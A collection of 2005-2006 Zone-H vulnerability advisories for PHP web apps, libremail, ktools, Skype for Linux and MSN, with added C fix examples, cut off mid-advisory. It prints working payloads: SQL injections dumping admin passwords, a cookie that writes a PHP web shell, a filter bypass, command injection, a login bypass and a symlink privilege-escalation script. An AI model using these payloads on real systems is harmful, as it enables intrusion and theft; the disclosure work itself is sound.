IT is Zone-H's contribution to the IT security world. It is a tool for keeping administrators and ITsec professionals always up to date. It's cool. It's free. It's the InfoSec pager.
ZH2006-20 SA: CosmicShoppingCart Multiple Vulnerabilities
05/26/2006
Software: CosmicShoppingCart (www.cosmicphp.com)
Risk: Medium
Discovered by: Vympel (Marcelo Almeida)
Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable shopping cart.
Description:
Multiple cross-site scripting and SQL injection vulnerabilities have been found in CosmicShoppingCart.
Details:
1) Multiple cross-site scripting vulnerabilities have been found in the following pages:
cosmicshop/search.php
cosmicshop/search_cat.php
cosmicshop/search_price.php
cosmicshop/product_details.php
Examples:
cosmicshop/search.php?query=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
cosmicshop/search_cat.php=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
2) SQL injections have been found; they could be exploited by users to retrieve the passwords of the admin.
Examples:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--
Solution:
Edit the source code to ensure that input is properly sanitised.
Vendor: First contact 16/02/2005
Contacted again on 25/03/2005
Advisory published 25/05/2006

ZRCSA-200505: libremail - "pop.c" Format String Vulnerability
12/16/2005
Zone-H Research Center Security Advisory 200505
http://www.zone-h.fr
Date of release: 16/12/2005
Software: libremail (http://libremail.tuxfamily.org/en/)
Affected versions: <= 1.1.0
Risk: Low/Medium
Discovered by: Mehdi Oudad "deepfear" from the Zone-H Research Team
Background
----------
libremail is a set of command-line mail tools; it includes several clients and allows mail filtering.
From http://libremail.tuxfamily.org/en/trad.htm :
This web site is intended to present to you all the electronic mail applications I developed.
This software functions under GNU/Linux and should normally run without any modification under the other UNIX systems.
On the other hand, I did not consider it useful (and a fortiori a priority) to adapt these applications to make them run also under Windows.
Details
--------
There is a format string vulnerability in pop.c:
[...]
void lire_pop ()
{
    int posbuf;
    // initialisation
    posbuf = 0;
    // read until end of line or end of buffer
    do
        recv (sockfd, buf_lect + posbuf, 1, 0);
    while (buf_lect [posbuf++] != '\n' && posbuf < sz_buflect);
    // terminate the string that was read (strip \r\n)
    if (posbuf > 1 && buf_lect [posbuf - 2] == '\r')
        buf_lect [posbuf - 2] = '\0';
    else
        buf_lect [posbuf - 1] = '\0';
#ifdef DEBUG
    putchar ('<');
    printf (buf_lect);   // server-controlled data used as the format string
#endif
}
It could be exploited by tricking a user into connecting to a malicious POP server, or by sending a malicious mail (if the user reads it through a POP server); however, it requires that debug mode is enabled (not the default setting).
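As an added illustration (not libremail's code), here is a bounded line reader in the spirit of lire_pop() whose debug echo goes through fputs() instead of printf(buf_lect), so the server's bytes are never used as a format string. It assumes a plain file descriptor read with read() rather than recv() on sockfd, and the hostile reply it is fed is constructed for the demo.

```c
/* Added example (not libremail's code): a bounded line reader in the spirit
 * of lire_pop(), with the debug echo done through fputs() so that bytes
 * received from the server are never used as a printf() format string.
 * Assumption: it reads a plain file descriptor with read() (libremail uses
 * recv() on sockfd), so the demo can feed it a constructed reply via a pipe. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Read one CRLF-terminated line from fd into buf (capacity cap). Returns the
 * number of payload bytes stored with the line ending stripped, or -1 if
 * nothing could be read. The result is always NUL-terminated; a line longer
 * than cap-1 bytes is truncated instead of overflowing the buffer. */
static int read_pop_line(int fd, char *buf, size_t cap)
{
    size_t posbuf = 0;

    if (cap == 0)
        return -1;
    /* read until end of line or end of buffer, one byte at a time like lire_pop() */
    while (posbuf < cap - 1) {
        if (read(fd, buf + posbuf, 1) <= 0)
            break;                          /* EOF or error: keep what we have */
        if (buf[posbuf++] == '\n')
            break;
    }
    if (posbuf == 0) {
        buf[0] = '\0';
        return -1;
    }
    /* terminate the string and strip \r\n (or a lone \n) */
    if (buf[posbuf - 1] == '\n')
        posbuf--;
    if (posbuf > 0 && buf[posbuf - 1] == '\r')
        posbuf--;
    buf[posbuf] = '\0';
#ifdef DEBUG
    /* The fix for ZRCSA-200505: the data is an argument, never the format. */
    putchar('<');
    fputs(buf, stdout);
    putchar('\n');
#endif
    return (int)posbuf;
}

/* Demo helper: push a constructed server reply through a pipe and read it back. */
static int demo_read(const char *reply, char *out, size_t cap)
{
    int fds[2];
    ssize_t written;
    int got;

    if (pipe(fds) != 0)
        return -1;
    written = write(fds[1], reply, strlen(reply));
    close(fds[1]);
    got = (written < 0) ? -1 : read_pop_line(fds[0], out, cap);
    close(fds[0]);
    return got;
}

int main(void)
{
    char line[64];
    /* constructed hostile reply: full of printf directives, harmless here */
    int n = demo_read("+OK %s%s%s%n %x hostile reply\r\n", line, sizeof line);
    printf("%d bytes: %s\n", n, line);
    return 0;
}
```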
Solution
---------
The vendor has published updated sources:
http://libremail.tuxfamily.org/en/dersources.htm
They will also be included in an upcoming version (with other bugfixes and new features).

ZH2005-18SA: Php-Nuke Platinum patched with Nuke Sentinel Sql Injection
12/12/2005
Php-Nuke Platinum is a fork of Php-Nuke designed to be more secure and stable. After the maker, Tech-gfx, abandoned the project, another group made patches, removed the stock Protector system and installed NukeSentinel. At that time this old search-query SQL injection was never fixed, as they assumed NukeSentinel would block it. Now that there is a way to get past NukeSentinel, all Php-Nuke Platinum sites with NukeSentinel and the Search module active are vulnerable. There is no patch for Php-Nuke Platinum at this time.
Exploit:
It has been discovered that an older exploit, modified to bypass NukeSentinel, is now affecting Php-Nuke Platinum sites with all patches and NukeSentinel installed.
It is an SQL injection into the search query. Example:
www.target.com/modules.php?name=Search&type=comments&query=not123exists&instory=/%2a%2a/UNION/%2a%2a/ SELECT/%2a%2a/0,0,pwd,0,aid/%2a%2a/FROM/%2a%2a/nuke_authors
UPDATE: Fix: Update sentinel with fix from www.ravenphpscripts.com or patch from www.platinummods.com

ZH2005-17SA: Nuke Sentinel Php-Nuke Security Script Bypass
12/12/2005
NukeSentinel is a security script for Php-Nuke sites for blocking hacking attempts. The creators are Bob Marion from www.nukescripts.net and Raven from http://ravenphpscripts.com; it is supposed to block all strings used in SQL injection and scripting attacks.
It has been discovered that an attacker can bypass NukeSentinel for any kind of attack by using %2a%2a in a query instead of the ** or ( ) that NukeSentinel alerts on. Example:
www.target.com/modules.php?name=[module name]&file=search&bywhat=aid&exact=1&forwhat=kala%27/%2a%2a/[Script]
Other scripts such as protector and admin secure will stop this.
UPDATE: A fix has been issued at http://www.ravenphpscripts.com/postt7705.html (it is also advised to keep current on all patches available from http://www.nukeresources.com).
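An added example (not NukeSentinel's or Php-Nuke's code) of the filtering principle behind both ZH2005-18SA and ZH2005-17SA: a request filter has to match on the percent-decoded query the application will actually see, since %2a%2a becomes ** once PHP decodes it. The pattern list, buffer sizes and sample queries are constructed for the demo.

```c
/* Added example: decode-then-match request filtering. Matching on the raw
 * query string misses "/%2a%2a/" because the bytes "**" only appear after
 * percent-decoding. is_suspicious() decodes once (what PHP hands the
 * application), folds SQL comments and whitespace, then matches a small
 * constructed pattern list. raw_filter_hit() models the raw matcher. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

static int hexval(int c)
{
    if (isdigit(c)) return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* One pass of %XX decoding, '+' to space. Invalid escapes are copied as-is. */
static void url_decode(const char *in, char *out, size_t cap)
{
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0' && o + 1 < cap; i++) {
        int hi, lo;
        if (in[i] == '%' && (hi = hexval((unsigned char)in[i + 1])) >= 0
                         && (lo = hexval((unsigned char)in[i + 2])) >= 0) {
            out[o++] = (char)(hi * 16 + lo);
            i += 2;
        } else if (in[i] == '+') {
            out[o++] = ' ';
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
}

/* Lower-case the text and replace each slash-star SQL comment and each run of
 * whitespace with a single space, so UNION followed by a comment and SELECT
 * normalises to "union select". */
static void normalize(const char *in, char *out, size_t cap)
{
    size_t o = 0;
    int last_space = 0;
    for (size_t i = 0; in[i] != '\0' && o + 1 < cap; i++) {
        int is_gap = 0;
        if (in[i] == '/' && in[i + 1] == '*') {
            const char *end = strstr(in + i + 2, "*/");
            i = end ? (size_t)(end - in) + 1 : strlen(in) - 1;  /* skip the comment */
            is_gap = 1;
        } else if (isspace((unsigned char)in[i])) {
            is_gap = 1;
        }
        if (is_gap) {
            if (!last_space) { out[o++] = ' '; last_space = 1; }
            continue;
        }
        out[o++] = (char)tolower((unsigned char)in[i]);
        last_space = 0;
    }
    out[o] = '\0';
}

/* Constructed pattern list; a real filter is broader and still has false
 * positives on ordinary text such as "credit union select members". */
static const char *const PATTERNS[] = { "union select", "into outfile", NULL };

/* 1 if the decoded, normalised query matches a pattern, else 0. */
static int is_suspicious(const char *raw_query)
{
    char decoded[1024], norm[1024];
    url_decode(raw_query, decoded, sizeof decoded);
    normalize(decoded, norm, sizeof norm);
    for (int i = 0; PATTERNS[i] != NULL; i++)
        if (strstr(norm, PATTERNS[i]) != NULL)
            return 1;
    return 0;
}

/* The weak approach: looking for the literal comment marker in the raw query. */
static int raw_filter_hit(const char *raw_query)
{
    return strstr(raw_query, "/**/") != NULL;
}

int main(void)
{
    const char *q = "instory=/%2a%2a/UNION/%2a%2a/SELECT/%2a%2a/0,0,pwd";  /* constructed */
    printf("raw filter: %d  decoded filter: %d\n", raw_filter_hit(q), is_suspicious(q));
    return 0;
}
```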

ZRCSA-200504 - dotclear SQL Injection
12/01/2005
ZRCSA-200504 - dotclear SQL Injection
Zone-H Research Center Security Advisory 200504
http://www.zone-h.fr
Date of release: 30/11/2005
Software: dotclear (http://www.dotclear.net)
Affected versions: <= 1.2.2
Risk: Medium
Discovered by: Kevin Fernandez "Siegfried" from the Zone-H Research Team
Background
----------
dotclear is a weblog written in PHP.
from http://www.dotclear.net/en/features.html :
Code conforms to the W3C standards, including XHTML 1.0
Use of CSS
URL significant
RSS and Atom feeds
[...]
Details
--------
The $ses_id variable isn't filtered before being used in SQL queries in /inc/session.php :
[...]
function _read($ses_id)
{
    $strReq = 'SELECT * FROM '.$this->table.' '.
              'WHERE ses_id = \''.$ses_id.'\' ';
    $rs = $this->con->select($strReq);
[...] (and other queries in the same file, with the same variable)
Since this file is used in all the pages, it can be used to perform arbitrary SQL queries by opening a page (for example index.php) with the following cookie:
dc_xd=siegfried'/**/UNION/**/SELECT
user_id,user_pseudo,user_nom,user_email from dc_user into outfile
"/var/www/blah"/*
or:
dc_xd=siegfried'/**/UNION/**/SELECT "<? system($_GET[blah])
?>","","","" from dc_user into outfile "/var/www/dotclear/blah.php"/*
We can gather the path of dotclear by accessing multiple files directly in the admin area, for example /ecrire/inc/connexion.php; this might help to exploit the SQL injection.
Solution
---------
Update to version 1.2.3 or replace /inc/session.php with the new version:
https://www.dotclear.net/svn/branches/1.2.3-stable/inc/session.php
http://www.dotclear.net/download/dotclear-1.2.3.tar.gz
(vendor contacted on 30/11 and patch released on the same day).

ZRCSA 200503: Ktools Buffer Overflow Vulnerability
11/27/2005
Zone-H Research Center Security Advisory 200503
http://www.zone-h.fr
Date of release: 27/11/2005
Software: ktools (http://konst.org.ua/ktools)
Affected versions: <= 0.3
Risk: Medium
Discovered by: Mehdi Oudad "deepfear" and Kevin Fernandez "Siegfried" from the Zone-H Research Team
Background (from http://konst.org.ua/ktools)
----------
ktools is a library which I wrote for my own programming needs, though its main purpose is to provide various text-mode user interface controls without a need to write too much code.
Details
--------
There is a buffer overflow in kkstrtext.h :
#define VGETSTRING(c, fmt) \
{ \
    va_list vgs__ap; char vgs__buf[1024]; \
    va_start(vgs__ap, fmt); \
    vsprintf(vgs__buf, fmt, vgs__ap); c = vgs__buf; \
    va_end(vgs__ap); \
}
This library is used in the following software:
centericq
orpheus
motor
groan
(see http://konst.org.ua/en/konstware)
It can be exploited for example in centericq when editing a contact's details with a detail field longer than 1024 chars (for example the <description> field of an RSS feed).
Details:
- centericq.cc :
    case ACT_EDITUSER:
        c->save();
        /***************** here ************/
        if(face.updatedetails(c, c->getdesc().pname)) {
            if(c->getdesc().pname == infocard)
                c->setdispnick(c->getnick());
        ...
        ...
- icqdialogs.cc :
    bool icqface::updatedetails(icqcontact *c, protocolname upname) {
        ...
        ...
        while(!finished) {
            gendetails(db.gettree(), c);
        ...
        ...
    gendetails()
    ..
        if((capab.count(hookcapab::flexiblereg) && ri.params.empty()) || !capab.count(hookcapab::flexiblereg)) {
            i = tree->addnode(_(" About "));
            tree->addleaff(i, 0, 39, " %s ", about.c_str());
- treeview.cc :
    int treeview::addleaff(int parent, int color, int ref, const char *fmt, ...) {
        string buf;
        VGETSTRING(buf, fmt);
        return addleaf(parent, color, (void *) ref, buf);
    }
- kkstrtext.h :
    #define VGETSTRING(c, fmt) \
    { \
        va_list vgs__ap; char vgs__buf[1024]; \
        va_start(vgs__ap, fmt); \
        vsprintf(vgs__buf, fmt, vgs__ap); c = vgs__buf; \
        va_end(vgs__ap); \
    }
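An added replacement for the macro (not ktools' code) that measures with vsnprintf() before allocating, so that a detail field of any length, such as the oversize <description> described above, is formatted without a fixed 1024-byte buffer. It returns a malloc'd C string instead of assigning to a std::string, and the centericq call-site names appear only in comments.

```c
/* Added example (not ktools' code): a replacement for VGETSTRING() that
 * measures with vsnprintf() and allocates exactly what the formatted text
 * needs, instead of vsprintf() into a fixed char vgs__buf[1024]. The result
 * is a malloc'd C string the caller frees (ktools assigns to a std::string). */
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Format fmt with the arguments in ap into a freshly allocated buffer.
 * Returns NULL on an encoding or allocation error. */
static char *vgetstring_safe(const char *fmt, va_list ap)
{
    va_list ap2;
    int needed;
    char *out;

    va_copy(ap2, ap);                      /* the first pass consumes ap */
    needed = vsnprintf(NULL, 0, fmt, ap);  /* pass 1: measure, write nothing */
    if (needed < 0) {
        va_end(ap2);
        return NULL;
    }
    out = malloc((size_t)needed + 1);
    if (out != NULL)
        vsnprintf(out, (size_t)needed + 1, fmt, ap2);  /* pass 2: bounded write */
    va_end(ap2);
    return out;
}

/* Variadic front end, the shape a caller such as addleaff(..., fmt, ...) needs. */
static char *getstring_safe(const char *fmt, ...)
{
    va_list ap;
    char *s;

    va_start(ap, fmt);
    s = vgetstring_safe(fmt, ap);
    va_end(ap);
    return s;
}

/* Demo: build the " %s " leaf that centericq's " About " node uses from a
 * constructed field of len bytes and return the formatted length. With the
 * original macro anything over 1021 bytes overflowed vgs__buf. */
static size_t about_leaf_len(size_t len)
{
    char *field = malloc(len + 1);
    char *leaf;
    size_t n;

    if (field == NULL)
        return 0;
    memset(field, 'A', len);               /* stands in for an oversize <description> */
    field[len] = '\0';
    leaf = getstring_safe(" %s ", field);
    n = leaf ? strlen(leaf) : 0;
    free(leaf);
    free(field);
    return n;
}

int main(void)
{
    printf("leaf length for a 5000-byte field: %zu\n", about_leaf_len(5000));
    return 0;
}
```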
Solution
---------
None. Vendor contacted on 18/11 and 25/11, no answer.

ZRCSA 200502: phpAdsNew SQL Injections
11/11/2005
ZRCSA-200502 - phpAdsNew SQL Injection Vulnerabilities
Zone-H Research Center Security Advisory 200502
http://www.zone-h.fr
Date of release: 11/11/2005
Software: phpAdsNew (www.phpadsnew.com)
Affected versions:
<= 2.0.6
2.0.7rc1 (latest CVS snapshot)
Risk: Medium
Discovered by: Kevin Fernandez "Siegfried" from the Zone-H Research Team
Background (from their web site)
----------
phpAdsNew is an open-source ad server, with an integrated banner management interface and tracking system for gathering statistics. With phpAdsNew you can easily rotate paid banners and your own in-house advertisements. You can even integrate banners from third party advertising companies.
Details
--------
Toni Koivunen published an advisory yesterday regarding a vulnerability exploitable via /admin/logout.php that can be used to delete arbitrary data (maybe more). However, more SQL injections are present in this part of the code: none of the functions in /admin/lib-sessions.inc.php check the "sessionID" variable coming from the cookie. The most interesting is phpAds_SessionDataFetch(), because it is called in config.php and makes a simple SELECT query.
Snip:
[no previous check]
if (isset($HTTP_COOKIE_VARS['sessionID']) && $HTTP_COOKIE_VARS['sessionID'] != '')
{
    $result = phpAds_dbQuery("SELECT sessiondata FROM ".$phpAds_config['tbl_session']." WHERE sessionid='".$HTTP_COOKIE_VARS['sessionID']."'" .
        " AND UNIX_TIMESTAMP(NOW())-UNIX_TIMESTAMP(lastused) < 3600");   // <-- ouch
Since /admin/config.php is included in /admin/index.php, we don't need to be authenticated to exploit the vulnerability.
PoC (cookie):
sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into outfile "/var/www/blah.txt"/*;
Just "exploit" one of the many errors in the pages to get the path, and there you go: open /admin/index.php with that as the cookie.
Solution
---------
No patch.
Filter the variable in the affected functions.
Original advisories:
English version: http://www.zone-h.org/en/advisories/read/id=8413/
French: http://www.zone-h.fr/fr/advisories/read/id=674/

[ZH2005-16SA] Skype for Linux - Insecure temporary file creation
07/15/2005
[ZH2005-16SA] Skype for Linux - Insecure temporary file creation
Application: Skype for Linux
Version affected: <= 1.1.0.20
Vendor website : http://www.skype.com
Author: Giovanni Delvecchio
e-mail: badpenguin@zone-h.org
About Skype
=========
Skype is a free program that uses the latest P2P technology to bring affordable and high-quality voice communications to people all over the world. It also provides an instant messaging service.
Details
=====
Each user has his own profile, which can be personalized with a picture. When a user adds a picture to his profile, Skype creates a file named "skype_profile.jpg" in the /tmp directory in an insecure manner, without checking whether the file already exists or whether it is a symbolic link.
-----------------------------------------------------------------------------------------------------------------------------------------
bad@badpenguin:~/skype-1.1.0.20$ strace -e trace=open skype
.
.
open("/home/bad/image.jpg", O_RDONLY|O_LARGEFILE) = 21 // picture chosen by user
open("/tmp/skype_profile.jpg", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 23 // insecure temporary file creation (it should use O_EXCL or O_NOFOLLOW flag)
.
.
------------------------------------------------------------------------------------------------------------------------------------------
This could represent a security problem in a multi-user environment because the /tmp directory is usually world-writable.
Indeed, such a problem could be exploited by a malicious local user via a symlink attack to overwrite arbitrary files with the privileges of the user running Skype.
Example:
ln -s file_to_overwrite /tmp/skype_profile.jpg
When the user adds a picture to his profile, the file symlinked by the attacker will be overwritten with the content of the file that the user has chosen for his profile.
Under certain conditions a privilege escalation is possible.
An example of privilege escalation exploiting this type of vulnerability is the following:
from http://www.securityfocus.com/archive/82/327361/2003-06-29/2003-07-05/0 :
"Starting release 9, Red Hat ships and uses pam_timestamp_check.so module
(accompanied by /sbin/pam_timestamp_check setuid helper), a part of the
new pam-0.75 (Pluggable Authentication Modules) package. PAM is a generic
centralized authentication and session management component that is also
shipped by an increasing number of other distributions, so it is
reasonable that the code is about to propagate to other distros.
The module mentioned implements a credential caching functionality, very
closely inspired on a tty ticketing system used in sudo.
The way the module works(and sudo), in essence, is that it gets current
pseudo-terminal name A, current user name B, and the user for which
credentials are cached, C (usually root for Red Hat applications, user
himself for sudo). Then the code checks for /var/run/sudo/B/A:C (or
/var/run/sudo/B/A if B == C), and if the file is recent (regardless of its content), the module returns success, and enables the user to skip the usual password
authentication.
Since there's no check for file origin, it should be more than obvious that suddenly, any insecure file creation problem in an application used by a superuser, it is possible to spoof a ticket in /var/run and bypass root password prompt and other checks, and perform administrative tasks, easily modifying system config, installing custom components (say, a rootshell), etc. All this by
crafting a single symlink that is later opened with O_CREAT with no O_EXCL
or O_NOFOLLOW."
Example:
----------------------------------------------------------------------------------------
#!/bin/sh
#get current terminal number from /dev/pts/xx
terminal_number=`tty | cut -f4 -d '/'`
user_ticket=$USER/$terminal_number:root
ln -s /var/run/sudo/$user_ticket /tmp/skype_profile.jpg
---------------------------------------------------------------------------------------------
Solution
======
No fix available at the moment.
Grant write access to the /tmp directory only to trusted users.
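The O_EXCL / O_NOFOLLOW fix called for in the strace annotation above, as an added example that is not Skype's code: the demo creates a private directory under /tmp with mkdtemp() (assumption: /tmp is writable), plants a symlink named skype_profile.jpg there, and shows the original open() flags following it while the fixed flags refuse.

```c
/* Added example (not Skype's code): creating the profile picture file safely.
 * open_private_new() uses O_EXCL | O_NOFOLLOW, the flags the strace
 * annotation asks for, so a pre-planted symlink makes the open fail instead
 * of redirecting the write. demo_symlink_defence() reproduces the scenario in
 * a private mkdtemp() directory under /tmp (assumption: /tmp is writable). */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create path for writing; refuse an existing file or a symlink. Mode 0600,
 * not 0666: the picture is the user's own data. Returns the fd or -1 with
 * errno set (EEXIST or ELOOP when something was planted at that name). */
static int open_private_new(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Plant skype_profile.jpg as a symlink to victim.txt, then open it first with
 * the flags seen in the advisory and then with the fixed ones. Bit 1 is set if
 * the unsafe open truncated the victim, bit 2 if the safe open refused; the
 * expected result is therefore 3. Returns -1 on setup failure. */
static int demo_symlink_defence(void)
{
    char dir[] = "/tmp/tmpfile_demo_XXXXXX";       /* constructed scratch dir */
    char victim[256], link[256];
    struct stat st;
    int fd, result = 0;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim.txt", dir);
    snprintf(link, sizeof link, "%s/skype_profile.jpg", dir);

    /* the file a local attacker would want overwritten */
    fd = open(victim, O_WRONLY | O_CREAT, 0600);
    if (fd < 0 || write(fd, "original", 8) != 8 || symlink(victim, link) != 0) {
        if (fd >= 0) close(fd);
        return -1;
    }
    close(fd);

    /* flags from the strace: O_TRUNC follows the link and empties victim.txt */
    fd = open(link, O_WRONLY | O_CREAT | O_TRUNC, 0666);
    if (fd >= 0) {
        close(fd);
        if (stat(victim, &st) == 0 && st.st_size == 0)
            result |= 1;
    }

    /* fixed flags: the planted link is rejected and victim.txt is never touched */
    fd = open_private_new(link);
    if (fd < 0 && (errno == EEXIST || errno == ELOOP))
        result |= 2;
    else if (fd >= 0)
        close(fd);

    unlink(link);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("demo result (3 = unsafe open followed the link, safe open refused): %d\n",
           demo_symlink_defence());
    return 0;
}
```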
Timeline
======
April 7th 2005 - bug discovered
April 8th 2005 - Skype contacted by security@skype.net
April 15th 2005 - 1st Response from Skype:
"Thank you for the email, we will pass it on to our developers.
Regards,
Andres"
May 25th 2005 - Skype for Linux version 1.1.0.13 released, the problem is still present.
May 27th 2005 - Skype re-contacted by security@skype.net
May 27th 2005 - 2nd Response from Skype:
"Giovanni, Thank you for the email again. I've spoken to our Linux developers and they assure me this will be fixed in the next version and they are considering posting an immediate advisory.
Again, your help is appreciated.
Regards,
Andres"
July 5th 2005 - Skype for Linux version 1.1.0.20 released, but the bug hasn't been fixed.
July 15th 2005 - Public advisory
Author's Note
==========
Although this type of vulnerability isn't a problem for a single desktop user, it could represent a problem in a multi-user environment.
For example, Skype is used by many companies with some hundreds of employees, and in such an environment several users have access to a host, locally or remotely. Any user, even with low privileges, could exploit this type of vulnerability to overwrite or create arbitrary files with the privileges of the user running Skype, and in certain cases conduct a privilege escalation.
A study made by CERT (Computer Emergency Response Team) called ITS (Insider Threat Study) shows that many times the incidents in companies are perpetrated by insiders (e.g. current or former employees).
So I think that in these conditions this bug may represent a security problem, and Skype should fix it quickly.
Reference
=======
http://www.zone-h.org/advisories/read/id=7808

ZH2005-15SA (security advisory): Onpumoe Global Note Script read.cgi version 4.20 Remote Arbitrary Command Execution Vulnerability
07/04/2005
ZH2005-15SA (security advisory): Onpumoe Global Note Script read.cgi version 4.20 Remote Arbitrary Command Execution Vulnerability
Discovered by: Nicola (AcidCrash) Ballotta
Released: 04 07 2005
Name: Global Note Script
Affected Systems: 4.20 and previous
Issue: Remote Arbitrary Command Execution
Author:
SPAX and AcidCrash of ZetaLabs, Zone-h Laboratories - www.zone-h.org
SPAX@zone-h.org - techflow@gmail.com - zetalabs@zone-h.org
Description
*******************************************************
object: read.cgi
class: Input Validation Error
Global Note Script is a CGI-based online BBS board suite in Japanese. http://onpumoe.hp.infoseek.co.jp/
A remote command execution vulnerability has been discovered in the GNS Application by ZetaLabs, Zone-H Laboratories.
This issue occurs due to insufficient sanitization of externally supplied data to the read.cgi script that allows a remote user to pass an arbitrary shell command to be executed by the script. An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
This vulnerability has been reported to affect the version 4.20 of read.cgi.
The following exploit is provided:
http://www.example.com/cgi-bin/bbs/read.cgi?file=|uname%20-a|&bbs_id=00001

[ZH2005-14SA] Phishing problems on MSN
07/01/2005
[ZH2005-14SA] Phishing problems on MSN
Date: July 1st 2005
Author:Giovanni Delvecchio
email: badpenguin@zone-h.org
Overview
=======
Multiple phishing problems exist on support.msn.com, allowing an attacker to conduct phishing attacks against a user.
Details
=====
1) Input passed to the "ru" parameter in "pplogin.aspx" isn't properly sanitised before being returned to the user.
Example:
http://support.msn.com/pplogin.aspx?ru=http://www.evil-site.com">www.msn.com/
or
http://support.msn.com/pplogin.aspx?ru=%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%2D%73%69%74%65%2E%63%6F%6D%22%3E%77%77%77%2E%6D%73%6E%2E%63%6F%6D/
The problem has been fixed today.
A screenshot can be seen here:
http://www.zone-h.org/files/44/msn1.jpg
2) Input passed to the 'mspplogin' parameter isn't properly sanitised, and by using a specially crafted URL an attacker can cause the user to be redirected to an arbitrary URL for the Passport authentication.
Example:
http://support.msn.com/pplogin.aspx?msppchlg=1&mspplogin=http://www.evil-site.com/login.srf%3F
This problem at the moment has not been fixed.
Reference
=======
http://www.zone-h.org/advisories/read/id=7764
UPDATE - July 4th 2005
===============
Another phishing problem exists on login.passport.net. The problem is caused by input passed to the "ru" parameter in "uilogout.srf" not being properly sanitised.
By using a specially crafted URL an attacker can cause the user to be redirected to an arbitrary URL for the Passport authentication.
Example:
http://login.passport.net/uilogout.srf?id=2&ru=http://www.evil-site.com&ec=1
http://login.passport.net/uilogout.srf?id=2&ru=%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%2D%73%69%74%65%2E%63%6F%6D&ec=1

Dokeos: Multiple Vulnerabilities
06/17/2005
From: siegfried_at_zone-h.org
2 months ago we published an advisory about the Claroline application:
http://www.zone-h.org/advisories/read/id=7472
Dokeos (www.dokeos.com) 1.5.5 has the same vulnerabilities as Claroline because it was based on it, but not all of them: there are 3 file inclusion vulnerabilities, and some of the directory traversal, SQL injection and XSS vulnerabilities that we reported in Claroline (we didn't check further).
Previous versions are probably also affected.
We mailed the Dokeos staff (www.dokeos.com) on the same day (22/04).
The vendor now confirmed that all the vulnerabilities are fixed in
version 1.6 RC2 which is available here:
http://www.dokeos.com/download.php

[ZH2005-13SA] NEXTWEB (i)Site™ website management multiple vulnerabilities
06/01/2005
ZH2005-13SA (security advisory): NEXTWEB (i)Site™ multiple vulnerabilities
Published: 1 June 2005 - GOOD MONTH EVERYBODY ;-)
Released: 1 June 2005
Name: (i)Site™
Affected Versions: ALL
Issue: SQL injections, exception handling, unsafe directories
Author: Trash-80 - dpangalos@zone-h.org
Vendor: http://www.nextweb.gr & http://www.isite.gr
Description
***********
Zone-H Security Team has discovered multiple vulnerabilities in the (i)Site website management system, an expensive web application with high-profile customers. Unsafe directories, SQL injection vulnerabilities, and failures to validate user input and to handle exceptional conditions were found in (i)Site.
Details
*******
1. SQL injection in login.asp
You are able to bypass the authentication process by sending a crafted username and password that changes the SQL query in login.asp and thus grants you access to the administration of (i)Site.
e.g. www.victim.com/admin/login.asp
username: attacker
password: ' or 'a'='a
2. Databases are not located in a safe directory. Remote scanners used with malicious intent check for unsafe database directories; locating the databases outside the webroot is a good solution. Downloading the Users.mdb file discloses the administrator's username and password.
e.g. www.victim.com/databases/Users.mdb
3. Failure to handle exceptional conditions and to validate user input. The following will cause an error 500 for a few minutes.
e.g. www.victim.com/isite/page/*.asp?mu=&cmu='
Solution:
*********
Vendor has been contacted on May 24th.
Since then, the vendor did not reply to a series of e-mails informing him about the vulnerabilities in (i)Site.
UPDATE: Vendor replied today (1st June) claiming that corrections have been applied to (i)Site.
Trash-80 from Zone-H Security Labs - dpangalos@zone-h.org - zetalabs@zone-h.org

ZRCSA-200501 - Multiple vulnerabilities in Claroline
04/27/2005
Zone-H Research Center Security Advisory 200501
http://fr.zone-h.org
Date of release: 27/04/2005
Software: Claroline (www.claroline.net)
Affected versions:
1.5.3
1.6 beta
1.6 Release Candidate 1
(probably previous versions too)
Risk: High
Discovered by:
Kevin Fernandez "Siegfried"
Mehdi Oudad "deepfear"
from the Zone-H Research Team
Background (from their web site)
----------
Claroline is an Open Source software based on PHP/MySQL. It's a collaborative learning environment allowing teachers or education institutions to create and administer courses through the web.
Description
-----------
Multiple cross-site scripting, 10 SQL injection, 7 directory traversal and 4 remote file inclusion vulnerabilities have been found in Claroline.
Details
-------
1) Multiple cross-site scripting vulnerabilities have been found in the following pages:
claroline/exercice/exercise_result.php
claroline/exercice/exercice_submit.php
claroline/calendar/myagenda.php
claroline/calendar/agenda.php
claroline/tracking/user_access_details.php
claroline/tracking/toolaccess_details.php
claroline/learnPath/learningPathList.php
claroline/learnPath/learningPathAdmin.php
claroline/learnPath/learningPath.php
claroline/tracking/userLog.php
[..]
Examples:
claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
[..]
2) 10 SQL injections have been found; they could be exploited by users to retrieve the passwords of the admin or of arbitrary teachers or students.
claroline/learnPath/learningPath.php (3)
